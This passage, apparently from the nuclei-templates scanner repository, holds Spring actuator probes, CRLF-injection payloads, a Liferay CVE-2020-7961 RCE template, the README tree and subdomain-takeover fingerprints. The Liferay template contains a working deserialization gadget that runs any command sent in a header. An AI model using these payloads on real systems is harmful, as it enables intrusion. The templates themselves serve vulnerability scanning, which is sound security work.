"{{BaseURL}}/actuator/integrationgraph" 32 | - "{{BaseURL}}/actuator/jolokia" 33 | - "{{BaseURL}}/actuator/liquibase" 34 | - "{{BaseURL}}/actuator/logfile" 35 | - "{{BaseURL}}/actuator/loggers" 36 | - "{{BaseURL}}/actuator/loggingConfig" 37 | - "{{BaseURL}}/actuator/management" 38 | - "{{BaseURL}}/actuator/mappings" 39 | - "{{BaseURL}}/actuator/metrics" 40 | - "{{BaseURL}}/actuator/refresh" 41 | - "{{BaseURL}}/actuator/registeredServices" 42 | - "{{BaseURL}}/actuator/releaseAttributes" 43 | - "{{BaseURL}}/actuator/resolveAttributes" 44 | - "{{BaseURL}}/actuator/scheduledtasks" 45 | - "{{BaseURL}}/actuator/sessions" 46 | - "{{BaseURL}}/actuator/shutdown" 47 | - "{{BaseURL}}/actuator/springWebflow" 48 | - "{{BaseURL}}/actuator/sso" 49 | - "{{BaseURL}}/actuator/ssoSessions" 50 | - "{{BaseURL}}/actuator/statistics" 51 | - "{{BaseURL}}/actuator/status" 52 | - "{{BaseURL}}/actuator/threaddump" 53 | - "{{BaseURL}}/actuator/trace" 54 | - "{{BaseURL}}/auditevents" 55 | - "{{BaseURL}}/autoconfig" 56 | - "{{BaseURL}}/beans" 57 | - "{{BaseURL}}/cloudfoundryapplication" 58 | - "{{BaseURL}}/configprops" 59 | - "{{BaseURL}}/dump" 60 | - "{{BaseURL}}/env" 61 | - "{{BaseURL}}/health" 62 | - "{{BaseURL}}/heapdump" 63 | - "{{BaseURL}}/hystrix.stream" 64 | - "{{BaseURL}}/info" 65 | - "{{BaseURL}}/jolokia" 66 | - "{{BaseURL}}/jolokia/list" 67 | - "{{BaseURL}}:8090/jolokia" 68 | - "{{BaseURL}}:8090/jolokia/list" 69 | - "{{BaseURL}}/loggers" 70 | - "{{BaseURL}}/management" 71 | - "{{BaseURL}}/mappings" 72 | - "{{BaseURL}}/metrics" 73 | - "{{BaseURL}}/threaddump" 74 | - "{{BaseURL}}/trace" 75 | matchers-condition: and 76 | matchers: 77 | - type: word 78 | part: body 79 | words: 80 | - "method" 81 | - "spring" 82 | - "TYPE" 83 | - "system" 84 | - "database" 85 | - "cron" 86 | - "reloadByURL" 87 | - "JMXConfigurator" 88 | - "JMImplementation" 89 | - "EnvironmentManager" 90 | condition: or 91 | - type: status 92 | status: 93 | - 200 94 | - type: word 95 | words: 96 | - "X-Application-Context" 97 | - "application/json" 98 | - "application/vnd.spring-boot.actuator.v2+json" 99 | - "hprof" 100 | condition: or 101 | part: header 102 | -------------------------------------------------------------------------------- /vulnerabilities/crlf-injection.yaml: -------------------------------------------------------------------------------- 1 | id: crlf-injection 2 | 3 | info: 4 | name: CRLF injection 5 | author: melbadry9 & nadino & xElkomy 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/%0D%0ASet-Cookie:crlfinjection=crlfinjection" 12 | - "{{BaseURL}}/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=crlfinjection" # unicode bypass 13 | - "{{BaseURL}}/%0DSet-Cookie:crlfinjection=crlfinjection" 14 | - "{{BaseURL}}/%0ASet-Cookie:crlfinjection=crlfinjection" 15 | - "{{BaseURL}}/%3F%0DSet-Cookie%3Acrlfinjection=crlfinjection" 16 | - "{{BaseURL}}/%0ASet-Cookie%3Acrlfinjection/.." # Apache 17 | - "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection" # CVE-2016-4975 18 | - "{{BaseURL}}/?Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfinjection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjection=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection" 19 | 20 | matchers: 21 | - type: regex 22 | regex: 23 | - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' 24 | part: header 25 | -------------------------------------------------------------------------------- /cves/CVE-2020-7961.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-7961 2 | 3 | info: 4 | name: Liferay Portal Unauthenticated RCE 5 | author: dwisiswant0 6 | severity: high 7 | 8 | requests: 9 | - method: POST 10 | path: 11 | - "{{BaseURL}}/api/jsonws/invoke" 12 | - "{{BaseURL}}:8080/api/jsonws/invoke" 13 | headers: 14 | User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55" 15 | Connection: "close" 16 | Content-Type: "application/x-www-form-urlencoded" 17 | cmd2: "bash -c 'echo \"bm9uZXhpc3RlbnQ6MTMzNwo=\" | base64 -d'" 18 | body: "{\"p_auth\":\"AdsXeCqz\",\"tableId%3d1\":\"\",\"formDate\":\"1526638413000\",\"columnId\":\"123\",\"defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\":\"{\\\"userOverridesAsString\\\":\\\"HexAsciiSerializedMap:ACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878;\\\"}\",\"name\":\"A\",\"cmd\":\"{\\\"/expandocolumn/update-column\\\":{}}\",\"type\":\"1\"}" 19 | matchers: 20 | - type: word 21 | words: 22 | - "nonexistent:1337" 23 | part: body -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/nuclei) which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** and grow the list. 2 | 3 |

4 | Template Directory 5 | 6 | ``` 7 | ├── LICENSE 8 | ├── README.md 9 | ├── basic-detections 10 | │   ├── basic-xss-prober.yaml 11 | │   └── general-tokens.yaml 12 | ├── brute-force 13 | │   └── tomcat-manager-bruteforce.yaml 14 | ├── cves 15 | │   ├── CVE-2017-10075.yaml 16 | │   ├── CVE-2017-7529.yaml 17 | │   ├── CVE-2017-9506.yaml 18 | │   ├── CVE-2017-9841.yaml 19 | │   ├── CVE-2018-0296.yaml 20 | │   ├── CVE-2018-1000129.yaml 21 | │   ├── CVE-2018-11409.yaml 22 | │   ├── CVE-2018-11759.yaml 23 | │   ├── CVE-2018-1247.yaml 24 | │   ├── CVE-2018-1271.yaml 25 | │   ├── CVE-2018-13379.yaml 26 | │   ├── CVE-2018-14728.yaml 27 | │   ├── CVE-2018-16341.yaml 28 | │   ├── CVE-2018-18069.yaml 29 | │   ├── CVE-2018-19439.yaml 30 | │   ├── CVE-2018-20824.yaml 31 | │   ├── CVE-2018-2791.yaml 32 | │   ├── CVE-2018-3714.yaml 33 | │   ├── CVE-2018-3760.yaml 34 | │   ├── CVE-2018-5230.yaml 35 | │   ├── CVE-2018-7490.yaml 36 | │   ├── CVE-2019-10475.yaml 37 | │   ├── CVE-2019-11510.yaml 38 | │   ├── CVE-2019-12314.yaml 39 | │   ├── CVE-2019-14322.yaml 40 | │   ├── CVE-2019-14974.yaml 41 | │   ├── CVE-2019-15043.yaml 42 | │   ├── CVE-2019-16759.yaml 43 | │   ├── CVE-2019-17382.yaml 44 | │   ├── CVE-2019-18394.yaml 45 | │   ├── CVE-2019-19368.yaml 46 | │   ├── CVE-2019-19781.yaml 47 | │   ├── CVE-2019-19908.yaml 48 | │   ├── CVE-2019-19985.yaml 49 | │   ├── CVE-2019-2588.yaml 50 | │   ├── CVE-2019-3396.yaml 51 | │   ├── CVE-2019-3799.yaml 52 | │   ├── CVE-2019-5418.yaml 53 | │   ├── CVE-2019-8449.yaml 54 | │   ├── CVE-2019-8451.yaml 55 | │   ├── CVE-2019-8903.yaml 56 | │   ├── CVE-2019-8982.yaml 57 | │   ├── CVE-2020-10199.yaml 58 | │   ├── CVE-2020-10204.yaml 59 | │   ├── CVE-2020-1147.yaml 60 | │   ├── CVE-2020-12720.yaml 61 | │   ├── CVE-2020-13167.yaml 62 | │   ├── CVE-2020-2096.yaml 63 | │   ├── CVE-2020-3187.yaml 64 | │   ├── CVE-2020-3452.yaml 65 | │   ├── CVE-2020-5284.yaml 66 | │   ├── CVE-2020-5405.yaml 67 | │   ├── CVE-2020-5410.yaml 68 | │   ├── CVE-2020-5902.yaml 69 | │   ├── CVE-2020-6287.yaml 70 | │   ├── CVE-2020-7209.yaml 71 | │   ├── CVE-2020-7961.yaml 72 | │   ├── CVE-2020-8091.yaml 73 | │   ├── CVE-2020-8115.yaml 74 | │   ├── CVE-2020-8191.yaml 75 | │   ├── CVE-2020-8193.yaml 76 | │   ├── CVE-2020-8194.yaml 77 | │   ├── CVE-2020-8512.yaml 78 | │   ├── CVE-2020-8982.yaml 79 | │   ├── CVE-2020-9484.yaml 80 | │   └── CVE-2020-9757.yaml 81 | ├── dns 82 | │   ├── azure-takeover-detection.yaml 83 | │   ├── cname-service-detector.yaml 84 | │   ├── dead-host-with-cname.yaml 85 | │   └── servfail-refused-hosts.yaml 86 | ├── files 87 | │   ├── apc-info.yaml 88 | │   ├── cgi-test-page.yaml 89 | │   ├── debug-pprof.yaml 90 | │   ├── dir-listing.yaml 91 | │   ├── docker-registry.yaml 92 | │   ├── drupal-install.yaml 93 | │   ├── elasticsearch.yaml 94 | │   ├── exposed-kibana.yaml 95 | │   ├── exposed-svn.yaml 96 | │   ├── filezilla.yaml 97 | │   ├── firebase-detect.yaml 98 | │   ├── git-config.yaml 99 | │   ├── htaccess-config.yaml 100 | │   ├── jkstatus-manager.yaml 101 | │   ├── jolokia.yaml 102 | │   ├── laravel-env.yaml 103 | │   ├── lazy-file.yaml 104 | │   ├── phpinfo.yaml 105 | │   ├── public-tomcat-instance.yaml 106 | │   ├── security.txt.yaml 107 | │   ├── server-status-localhost.yaml 108 | │   ├── telerik-dialoghandler-detect.yaml 109 | │   ├── telerik-fileupload-detect.yaml 110 | │   ├── tomcat-scripts.yaml 111 | │   ├── wadl-files.yaml 112 | │   ├── web-config.yaml 113 | │   ├── wordpress-directory-listing.yaml 114 | │   ├── wordpress-user-enumeration.yaml 115 | │   ├── wp-xmlrpc.yaml 116 | │   └── zip-backup-files.yaml 117 | ├── panels 118 | │   ├── atlassian-crowd-panel.yaml 119 | │   ├── cisco-asa-panel.yaml 120 | │   ├── citrix-adc-gateway-detect.yaml 121 | │   ├── compal.yaml 122 | │   ├── crxde.yaml 123 | │   ├── docker-api.yaml 124 | │   ├── fortinet-fortigate-panel.yaml 125 | │   ├── globalprotect-panel.yaml 126 | │   ├── grafana-detect.yaml 127 | │   ├── jenkins-asyncpeople.yaml 128 | │   ├── jmx-console.yaml 129 | │   ├── kubernetes-pods.yaml 130 | │   ├── mongo-express-web-gui.yaml 131 | │   ├── parallels-html-client.yaml 132 | │   ├── phpmyadmin-panel.yaml 133 | │   ├── pulse-secure-panel.yaml 134 | │   ├── rabbitmq-dashboard.yaml 135 | │   ├── sap-netweaver-detect.yaml 136 | │   ├── sap-recon-detect.yaml 137 | │   ├── sophos-fw-version-detect.yaml 138 | │   ├── supervpn-panel.yaml 139 | │   ├── swagger-panel.yaml 140 | │   ├── tikiwiki-cms.yaml 141 | │   ├── weave-scope-dashboard-detect.yaml 142 | │   └── webeditors.yaml 143 | ├── payloads 144 | │   └── CVE-2020-6287.xml 145 | ├── security-misconfiguration 146 | │   ├── basic-cors-flash.yaml 147 | │   ├── basic-cors.yaml 148 | │   ├── front-page-misconfig.yaml 149 | │   ├── jira-service-desk-signup.yaml 150 | │   ├── jira-unauthenticated-dashboards.yaml 151 | │   ├── jira-unauthenticated-popular-filters.yaml 152 | │   ├── jira-unauthenticated-projects.yaml 153 | │   ├── jira-unauthenticated-user-picker.yaml 154 | │   ├── rabbitmq-default-admin.yaml 155 | │   ├── rack-mini-profiler.yaml 156 | │   ├── springboot-detect.yaml 157 | │   └── wamp-xdebug-detect.yaml 158 | ├── subdomain-takeover 159 | │   ├── detect-all-takeovers.yaml 160 | │   └── s3-subtakeover.yaml 161 | ├── technologies 162 | │   ├── bigip-config-utility-detect.yaml 163 | │   ├── citrix-vpn-detect.yaml 164 | │   ├── clockwork-php-page.yaml 165 | │   ├── couchdb-detect.yaml 166 | │   ├── github-enterprise-detect.yaml 167 | │   ├── gitlab-detect.yaml 168 | │   ├── graphql.yaml 169 | │   ├── home-assistant.yaml 170 | │   ├── jaspersoft-detect.yaml 171 | │   ├── jira-detect.yaml 172 | │   ├── liferay-portal-detect.yaml 173 | │   ├── linkerd-badrule-detect.yaml 174 | │   ├── linkerd-ssrf-detect.yaml 175 | │   ├── netsweeper-webadmin-detect.yaml 176 | │   ├── ntlm-directories.yaml 177 | │   ├── prometheus-exposed-panel.yaml 178 | │   ├── s3-detect.yaml 179 | │   ├── sap-netweaver-as-java-detect.yaml 180 | │   ├── sap-netweaver-detect.yaml 181 | │   ├── sql-server-reporting.yaml 182 | │   ├── tech-detect.yaml 183 | │   ├── weblogic-detect.yaml 184 | │   └── werkzeug-debugger-detect.yaml 185 | ├── tokens 186 | │   ├── amazon-mws-auth-token-value.yaml 187 | │   ├── aws-access-key-value.yaml 188 | │   ├── google-api-key.yaml 189 | │   ├── http-username-password.yaml 190 | │   ├── mailchimp-api-key.yaml 191 | │   └── slack-access-token.yaml 192 | ├── vulnerabilities 193 | │   ├── cached-aem-pages.yaml 194 | │   ├── couchdb-adminparty.yaml 195 | │   ├── crlf-injection.yaml 196 | │   ├── discourse-xss.yaml 197 | │   ├── git-config-nginxoffbyslash.yaml 198 | │   ├── ibm-infoprint-directory-traversal.yaml 199 | │   ├── microstrategy-ssrf.yaml 200 | │   ├── moodle-filter-jmol-lfi.yaml 201 | │   ├── moodle-filter-jmol-xss.yaml 202 | │   ├── nginx-module-vts-xss.yaml 203 | │   ├── open-redirect.yaml 204 | │   ├── oracle-ebs-bispgraph-file-access.yaml 205 | │   ├── pdf-signer-ssti-to-rce.yaml 206 | │   ├── rce-shellshock-user-agent.yaml 207 | │   ├── rce-via-java-deserialization.yaml 208 | │   ├── springboot-actuators-jolokia-xxe.yaml 209 | │   ├── symfony-debugmode.yaml 210 | │   ├── tikiwiki-reflected-xss.yaml 211 | │   ├── tomcat-manager-pathnormalization.yaml 212 | │   ├── twig-php-ssti.yaml 213 | │   ├── wordpress-duplicator-path-traversal.yaml 214 | │   ├── wordpress-wordfence-xss.yaml 215 | │   └── x-forwarded-host-injection.yaml 216 | └── workflows 217 | ├── bigip-pwner-workflow.yaml 218 | ├── jira-exploitaiton-workflow.yaml 219 | ├── liferay-rce-workflow.yaml 220 | ├── netsweeper-preauth-rce-workflow.yaml 221 | ├── rabbitmq-workflow.yaml 222 | ├── sap-netweaver-workflow.yaml 223 | └── springboot-pwner-workflow.yaml 224 | ``` 225 | 226 |
227 | 228 | 13 directories, **204 templates**. 229 | 230 | Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding. 231 | 232 | ------ 233 | **Notes:** 234 | 1. Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/)) to validate new templates when sending pull requests. 235 | 2. Use YAML Formatter (e.g. [jsonformatter](https://jsonformatter.org/yaml-formatter)) to format new templates when sending pull requests. 236 | 237 | Thanks again for your contribution and keeping the community vibrant. :heart: 238 | -------------------------------------------------------------------------------- /subdomain-takeover/detect-all-takeovers.yaml: -------------------------------------------------------------------------------- 1 | id: detect-all-takeovers 2 | 3 | info: 4 | name: Subdomain Takeover Detection 5 | author: "melbadry9 & pxmme1337" 6 | severity: high 7 | 8 | # Update this list with new takeovers matchers 9 | # Do not delete other template files for takeover 10 | # https://github.com/EdOverflow/can-i-take-over-xyz 11 | # You need to claim the subdomain / CNAME of the subdomain to confirm the takeover. 12 | # Do not report subdomain takeover issues only based on detection. 13 | # Total number of services #71 14 | 15 | requests: 16 | - method: GET 17 | path: 18 | - "{{BaseURL}}/" 19 | matchers-condition: or 20 | 21 | matchers: 22 | - type: word 23 | name: acquia 24 | words: 25 | - If you are an Acquia Cloud customer and expect to see your site at this address 26 | - The site you are looking for could not be found. 27 | 28 | - type: word 29 | name: agilecrm 30 | words: 31 | - Sorry, this page is no longer available. 32 | 33 | - type: word 34 | name: airee 35 | words: 36 | - Ошибка 402. Сервис Айри.рф не оплачен 37 | 38 | - type: word 39 | name: aftership 40 | words: 41 | - Oops.

The page you're looking for doesn't 42 | exist. 43 | 44 | - type: word 45 | name: aha 46 | words: 47 | - There is no portal here ... sending you back to Aha! 48 | 49 | - type: word 50 | name: anima 51 | words: 52 | - "If this is your website and you've just created it, try refreshing in a minute" 53 | 54 | - type: word 55 | name: aws-bucket 56 | words: 57 | - "The specified bucket does not exist" 58 | 59 | - type: word 60 | name: bigcartel 61 | words: 62 | - "

Oops! We couldn’t find that page.

" 63 | 64 | - type: word 65 | name: bitbucket 66 | words: 67 | - The page you have requested does not exist 68 | - Repository not found 69 | 70 | - type: word 71 | name: brightcove 72 | words: 73 | - '

Error Code: 404

' 74 | 75 | - type: word 76 | name: campaignmonitor 77 | words: 78 | - "Trying to access your account?" 79 | - or 97 | - 404 Not Found
98 | 99 | - type: word 100 | name: fastly 101 | words: 102 | - "Fastly error: unknown domain:" 103 | 104 | - type: word 105 | name: feedpress 106 | words: 107 | - The feed has not been found. 108 | 109 | - type: word 110 | name: frontify 111 | words: 112 | - 404 - Page Not Found 113 | - Oops… looks like you got lost 114 | condition: and 115 | part: body 116 | 117 | - type: word 118 | name: gemfury 119 | words: 120 | - "404: This page could not be found." 121 | 122 | - type: word 123 | name: getresponse 124 | words: 125 | - With GetResponse Landing Pages, lead generation has never been easier 126 | 127 | - type: word 128 | name: ghost 129 | words: 130 | - The thing you were looking for is no longer here 131 | - The thing you were looking for is no longer here, or never was 132 | 133 | - type: word 134 | name: github 135 | words: 136 | - There isn't a GitHub Pages site here. 137 | - For root URLs (like http://example.com/) you must provide an index.html file 138 | 139 | - type: word 140 | name: hatenablog 141 | words: 142 | - 404 Blog is not found 143 | - Sorry, we can't find the page you're looking for. 144 | 145 | - type: word 146 | name: helpjuice 147 | words: 148 | - We could not find what you're looking for. 149 | 150 | - type: word 151 | name: helprace 152 | words: 153 | - Alias not configured! 154 | - Admin of this Helprace account needs to set up domain alias 155 | - "(see Step 2 here: Using your own domain with Helprace)." 156 | 157 | - type: word 158 | name: helpscout 159 | words: 160 | - "No settings were found for this company:" 161 | 162 | - type: word 163 | name: heroku 164 | words: 165 | - There's nothing here, yet. 166 | - herokucdn.com/error-pages/no-such-app.html 167 | - "No such app" 168 | 169 | - type: word 170 | name: hubspot 171 | words: 172 | - Domain not found 173 | - does not exist in our system 174 | 175 | - type: word 176 | name: intercom 177 | words: 178 | - This page is reserved for artistic dogs. 179 | -

Uh oh. That page doesn’t exist.

180 | 181 | - type: word 182 | name: jazzhr 183 | words: 184 | - This account no longer active 185 | 186 | - type: word 187 | name: jetbrains 188 | words: 189 | - is not a registered InCloud YouTrack. 190 | 191 | - type: word 192 | name: kinsta 193 | words: 194 | - No Site For Domain 195 | 196 | - type: word 197 | name: landingi 198 | words: 199 | - It looks like you're lost 200 | - The page you are looking for is not found 201 | 202 | - type: word 203 | name: launchrock 204 | words: 205 | - It looks like you may have taken a wrong turn somewhere. Don't worry...it happens 206 | to all of us. 207 | 208 | - type: word 209 | name: mashery 210 | words: 211 | - Unrecognized domain 212 | 213 | - type: word 214 | name: ngrok 215 | words: 216 | - ngrok.io not found 217 | - Tunnel *.ngrok.io not found 218 | 219 | - type: word 220 | name: pantheon.io 221 | words: 222 | - "The gods are wise, but do not know of the site which you seek." 223 | 224 | - type: word 225 | name: pingdom 226 | words: 227 | - Public Report Not Activated 228 | - This public report page has not been activated by the user 229 | 230 | - type: word 231 | name: proposify 232 | words: 233 | - If you need immediate assistance, please contact Error 404: Page Not Found" 287 | 288 | - type: word 289 | name: teamwork 290 | words: 291 | - Oops - We didn't find your site. 292 | 293 | - type: word 294 | name: thinkific 295 | words: 296 | - You may have mistyped the address or the page may have moved. 297 | 298 | - type: word 299 | name: tictail 300 | words: 301 | - Building a brand of your own? 302 | - 'to target URL: The page you are looking for doesn't exist or has been 345 | moved.

346 | 347 | - type: word 348 | name: wishpond 349 | words: 350 | - https://www.wishpond.com/404?campaign=true 351 | 352 | - type: word 353 | name: wordpress 354 | words: 355 | - Do you want to register 356 | 357 | - type: regex 358 | name: worksites 359 | regex: 360 | - "(?:Company Not Found|you’re looking for doesn’t exist)" 361 | 362 | - type: word 363 | name: wufoo 364 | words: 365 | - Profile not found 366 | - Hmmm....something is not right. 367 | 368 | - type: word 369 | name: zendesk 370 | words: 371 | - this help center no longer exists 372 | 373 | - type: word 374 | name: readthedocs 375 | words: 376 | - unknown to Read the Docs 377 | 378 | - type: word 379 | name: tilda 380 | words: 381 | - Please renew your subscription 382 | - Please go to the site settings and put the domain name in the Domain tab. 383 | 384 | - type: word 385 | name: smart-jobboard 386 | words: 387 | - This job board website is either expired or its domain name is invalid. --------------------------------------------------------------------------------